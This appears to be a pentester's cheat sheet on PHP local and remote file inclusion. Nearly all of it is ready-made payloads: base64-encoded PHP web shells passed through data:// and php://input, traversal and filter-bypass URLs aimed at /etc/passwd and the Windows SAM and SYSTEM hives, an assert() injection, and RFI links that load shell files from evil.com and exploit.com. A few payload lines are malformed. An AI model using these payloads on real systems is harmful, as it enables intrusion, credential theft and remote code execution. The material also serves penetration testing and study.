File Inclusion

📚 Resources

• LFI to RCE
• HackTricks
• thehacker recipes
• Difference between LFI and Path traversal

Payloads

📌 Tips

# Command Injection via LFI
data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B
data:application/x-httpd-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B
data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php shell_exec($_GET["cmd"]); ?>
curl -X POST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

# Create session file
data://text/plain;base64,PD9waHAgaW5jbHVkZSgnL3Zhci9saWIvcGhwL3Nlc3Npb25zL3Nlc3NfYWJjZGVmJyk7ID8%2B

Base64 encoding

data:text/plain;base64,PD9waHAgaW5jbHVkZSgncGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1pbmRleC5waHAnKTsgPz4%3D

Double Chars Encoding

# Add %25 in front of encoding
http://example.com/index.php?page=%252E%252E%252Fetc%252Fpasswd
http://example.com/index.php?page=%252E%252E%252Fetc%252Fpasswd%00

Path Truncation

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

# Create a python script to exploit path truncation

http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]

From existent folder

Maybe the back-end is checking the folder path :

http://example.com/index.php?page=./../../
http://example.com/index.php?page=./../../../../../etc/passwd
http://example.com/index.php?page=assets/img/../../../../../etc/passwd
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

LFI via PHP assert

If the following code is used to filter user input :

assert("strpos('$file', '..') === false");

It is possible to inject code to escape the quotes and execute commands :

' and die(highlight_file('/etc/passwd')) or '
' and die(system("id")) or '

Filter bypass

If the filter is used to replace chars like

str_replace('../', '', $input),

# bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..././..././etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=///etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd

Linux - Windows

Try to change / by \

Payloads : C:\ c:%2F \\\etc%2Fpasswd

# windows file
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SOFTWARE
C:\inetpub\wwwroot\web.config

Remote File Inclusion

The RFI vulnerability allows the inclusion of remote files using wrappers like php://, data://, and others.

In PHP, if the allow_url_include directive in php.ini is set to "Off", wrappers are disabled, and RFI cannot be exploited.

# php.ini
allow_url_include = On # enables wrappers

basic exploit :

# js file injection
http://example.com/?page=http://evil.com/evil.js
http://example.com/?page=http://evil.com/evil.js%00 # null byte
http://example.com/?page=http%253A%252F%252Fevil%252Ecom%252Fevil%252Ejs # double encoding

# code not interpreted
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=\\evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

phpinfo()

If a PHP application is vulnerable to RFI, it can be exploited to load a remote PHP file. However, the remote server will not execute the PHP code, but instead serve it as plain text, exposing sensitive information.

echo '<?php phpinfo(); ?>' > phpinfo.php
# or bypass
echo 'php phpinfo(); ?' > phpinfo.php
echo '<php system('whoami'); ?>' > system.php
# Start a web server
python3 -m http.server 80

# Exploit the RFI to fetch the remote phpinfo.php file
curl '$URL/?page=http://exploit.com/phpinfo.php'

php://, data://, expect:// wrapper

To exfiltration the content of the file

# Remote inclusion via HTTP (requires allow_url_include = On)
data:text/plain;base64,PD9waHAgaW5jbHVkZSgncGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1pbmRleC5waHAnKTsgPz4%3D
php://filter/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd

expect://id | expect://ls